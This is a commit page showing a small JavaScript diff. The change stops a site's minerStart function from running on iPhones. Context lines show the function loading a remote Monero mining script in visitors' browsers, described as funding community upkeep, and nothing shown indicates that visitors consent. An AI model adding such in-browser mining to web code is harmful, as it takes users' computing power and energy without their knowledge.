Commit 7b48a0c4 authored by Vanessa's avatar Vanessa

iphone 不挖 xmr

parent dca5c128
......@@ -242,6 +242,9 @@ var Util = {
* @description xmr 挖矿,收入将用于维持社区运维
*/
minerStart: function () {
if (navigator.userAgent.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/)) {
return
}
$.ajax({
method: "GET",
url: 'https://img.hacpai.com/xmr.min.js',
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment